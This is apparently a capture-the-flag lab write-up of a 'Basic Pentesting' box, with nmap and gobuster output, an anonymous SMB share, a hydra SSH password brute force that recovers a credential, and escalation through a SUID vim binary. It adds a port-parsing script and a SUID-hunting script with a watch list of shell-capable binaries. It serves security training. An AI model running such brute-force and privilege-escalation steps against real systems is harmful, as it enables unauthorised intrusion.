Basic Pentesting
nmap reveals - 22/tcp ssh (OpenSSH 7.2p2) - 80/tcp http (Apache 2.4.18) - 139/tcp netbios/smb - 445/tcp netbios/smb (Samba 4.3.11) - 8009/tcp ajp13 (Tomcat's AJP connector) - 8080/tcp http (Apache Tomcat 9.0.7)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -O -sV -vv -A -T4 10.10.188.81
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 05:26 EST
Scanning 10.10.188.81 [4 ports]
Completed Ping Scan at 05:26, 0.18s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:26
Completed Parallel DNS resolution of 1 host. at 05:26, 0.04s elapsed
Initiating SYN Stealth Scan at 05:26
Scanning 10.10.188.81 [1000 ports]
Discovered open port 139/tcp on 10.10.188.81
Discovered open port 8080/tcp on 10.10.188.81
Discovered open port 22/tcp on 10.10.188.81
Discovered open port 445/tcp on 10.10.188.81
Discovered open port 80/tcp on 10.10.188.81
Discovered open port 8009/tcp on 10.10.188.81
Completed SYN Stealth Scan at 05:26, 1.60s elapsed (1000 total ports)
Initiating Service scan at 05:26
Scanning 6 services on 10.10.188.81
Completed Service scan at 05:26, 11.34s elapsed (6 services on 1 host)
Nmap scan report for 10.10.188.81
Host is up, received echo-reply ttl 61 (0.11s latency).
Scanned at 2023-01-31 05:26:41 EST for 34s
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
| 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack ttl 61 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 61 Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7
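The open-port summary at the top of this page was written by hand and it is easy to drop a port that way (8009/tcp ajp13 is in the scan but is the kind of line that gets skipped). The following is an added example, not part of the original writeup: a POSIX sh/awk extractor for the port table of nmap's normal output, with a constructed excerpt of the scan above embedded as test input. It handles both the default `PORT STATE SERVICE VERSION` layout and the `-vv`/`--reason` layout seen here, where a `syn-ack ttl 61` reason column sits between SERVICE and VERSION.

```shell
# Added example, not from the original writeup: extract the open-port table from
# saved nmap normal output (what the scan above prints) so the one-line summary of
# open ports is generated rather than transcribed by hand. POSIX sh + awk only.

# open_ports: read nmap normal output on stdin, print "port/proto service version"
# for every port whose STATE column is "open". Handles both layouts:
#   PORT STATE SERVICE VERSION            (default)
#   PORT STATE SERVICE REASON VERSION     (-vv / --reason, e.g. "syn-ack ttl 61")
open_ports() {
    awk '
        $1 ~ /^[0-9]+\/(tcp|udp|sctp)$/ && $2 == "open" {
            start = 4                          # version text starts right after SERVICE
            if ($5 == "ttl" && $6 ~ /^[0-9]+$/) {
                start = 7                      # "syn-ack ttl 61" reason columns present
            } else if ($4 ~ /^(syn-ack|udp-response|conn-refused|no-response)$/) {
                start = 5                      # reason present but without a ttl column
            }
            version = ""
            for (i = start; i <= NF; i++)
                version = version (i > start ? " " : "") $i
            print $1, $3, version
        }'
}

# open_port_count: number of open ports in the scan read from stdin
open_port_count() {
    open_ports | awk 'END { print NR }'
}

# sample_scan: constructed excerpt mirroring the scan output above. This is embedded
# test input, not a live scan of anything.
sample_scan() {
    cat <<'EOF'
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
8009/tcp open ajp13 syn-ack ttl 61 Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack ttl 61 Apache Tomcat 9.0.7
EOF
}

# Usage on a real scan saved with -oN:  sh ports.sh scan.txt
# With no argument the embedded sample is parsed instead.
if [ $# -gt 0 ]; then
    open_ports < "$1"
else
    sample_scan | open_ports
fi
```

For anything beyond a one-off, save the scan with `-oA` and parse the grepable (`.gnmap`) or XML (`.xml`) file instead; the normal-output format is meant for humans and this awk only covers the two column layouts shown.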
┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.188.81/Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
14318640 blocks of size 1024. 11077704 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~]
└─$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
┌──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.188.81
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.188.81
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/31 05:16:26 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.188.81/development/]
/server-status (Status: 403) [Size: 300]
Progress: 220560 / 220561 (100.00%)
===============================================================
2023/01/31 05:55:23 Finished
===============================================================
hydra against the user jan (named in staff.txt) reveals the password armando. This run is from an earlier session on 2023-01-30, when the target had the address 10.10.229.151; it took about seven minutes at roughly 110 tries/min, and hydra's own warning below applies: SSH servers cap concurrent sessions, so -t 4 is the sensible task count rather than the default 16.
┌──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ hydra -l jan -P /opt/rockyou.txt 10.10.229.151 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 11:07:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.229.151:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344233 to do in 1440:12h, 15 active
[STATUS] 110.33 tries/min, 331 tries in 00:03h, 14344068 to do in 2166:47h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343633 to do in 2184:38h, 15 active
[22][ssh] host: 10.10.229.151 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 11:14:41
┌──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ ssh jan@10.10.188.81
The authenticity of host '10.10.188.81 (10.10.188.81)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.188.81' (ED25519) to the list of known hosts.
jan@10.10.188.81's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
jan@basic2:~$ ls -aslp
total 12
4 drwxr-xr-x 2 root root 4096 Jan 31 10:36 ./
4 drwxr-xr-x 4 root root 4096 Apr 19 2018 ../
0 lrwxrwxrwx 1 root root 9 Jan 31 10:36 .bash_history -> /dev/null
4 -rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls
pass.bak
jan@basic2:/home/kay$ cat pass.bak
cat: pass.bak: Permission denied
jan@basic2:/home/kay$ vim pass.bak
jan@basic2:/home/kay$ ls -aslp
total 44
4 drwxr-xr-x 5 kay kay 4096 Jan 31 10:37 ./
4 drwxr-xr-x 4 root root 4096 Apr 19 2018 ../
0 lrwxrwxrwx 1 root root 9 Jan 31 10:36 .bash_history -> /dev/null
4 -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
4 -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
4 drwx------ 2 kay kay 4096 Apr 17 2018 .cache/
4 -rw------- 1 root kay 119 Apr 23 2018 .lesshst
4 drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano/
4 -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
4 -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
4 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh/
0 -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
4 -rw------- 1 root kay 538 Apr 23 2018 .viminfo
cat is denied because pass.bak is mode 0600 and owned by kay, so the question is whether the editor runs with more privilege than jan does. /usr/bin/vim on Ubuntu is an alternatives symlink; follow it to the real binary and check its mode bits:
jan@basic2:/home/kay$ ls -alh /etc/alternatives/vim
lrwxrwxrwx 1 root root 18 Apr 17 2018 /etc/alternatives/vim -> /usr/bin/vim.basic
jan@basic2:/home/kay$ ls -alh /usr/bin/vim.basic
-rwsr-xr-x 1 root root 2.4M Nov 24 2016 /usr/bin/vim.basic
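The `s` in the owner execute position means vim.basic runs with root's effective uid no matter who launches it, which is why an editor started by jan can open a file that cat cannot. The writeup found this by checking one binary; the following is an added example, not part of the original writeup, that does the same check across a whole tree: list every SUID file, show its owner, resolve a command through symlink chains like the /etc/alternatives hop above, and flag basenames that commonly hand out a shell or arbitrary file reads when SUID. The watch list is my assumption from common privilege-escalation references, not anything read off the target, and a hit means "inspect this", not "exploitable". POSIX sh plus GNU `readlink -f`.

```shell
# Added example, not from the original writeup: tree-wide SUID enumeration with the
# same checks the vim.basic finding above was made with, plus a watch list of names
# that deserve a close look when SUID (assumed list, adjust to taste).

# resolve_cmd PATH -> canonical path behind any chain of symlinks (GNU readlink -f)
resolve_cmd() {
    readlink -f "$1"
}

# is_suid PATH -> true if PATH is a regular file with the set-uid bit
is_suid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# suid_owner PATH -> owning user name, parsed from ls -l (portable across stat variants)
suid_owner() {
    ls -ld "$1" | awk '{ print $3 }'
}

# watch_name NAME -> true if a SUID binary with this basename deserves a close look
# (editors, pagers, interpreters and find can all read files or spawn a shell)
watch_name() {
    case "$1" in
        vim|vim.basic|vim.tiny|vi|nano|less|more|find|bash|sh|dash|python*|perl*|awk|gawk|env)
            return 0 ;;
        *)
            return 1 ;;
    esac
}

# suid_hunt ROOT -> one line per SUID regular file under ROOT:
#   "WATCH owner path"  for watch-listed names
#   "suid  owner path"  for everything else
# Symlinks are skipped (no -L), so /usr/bin/vim itself never appears; its target does.
suid_hunt() {
    find "$1" -type f -perm -4000 2>/dev/null | while IFS= read -r p; do
        if watch_name "$(basename "$p")"; then
            printf 'WATCH %s %s\n' "$(suid_owner "$p")" "$p"
        else
            printf 'suid  %s %s\n' "$(suid_owner "$p")" "$p"
        fi
    done
}

# Usage on a target:  sh suid_hunt.sh / | grep '^WATCH root'
if [ $# -gt 0 ]; then
    suid_hunt "$1"
fi
```

On a real host only the root-owned hits matter for escalation, which is what the owner column is for; `find / -user root -perm -4000 -type f` is the one-liner equivalent once you know what you are looking for. Pair the list with `resolve_cmd "$(command -v vim)"` so that what you check is the binary that actually runs, not the symlink name.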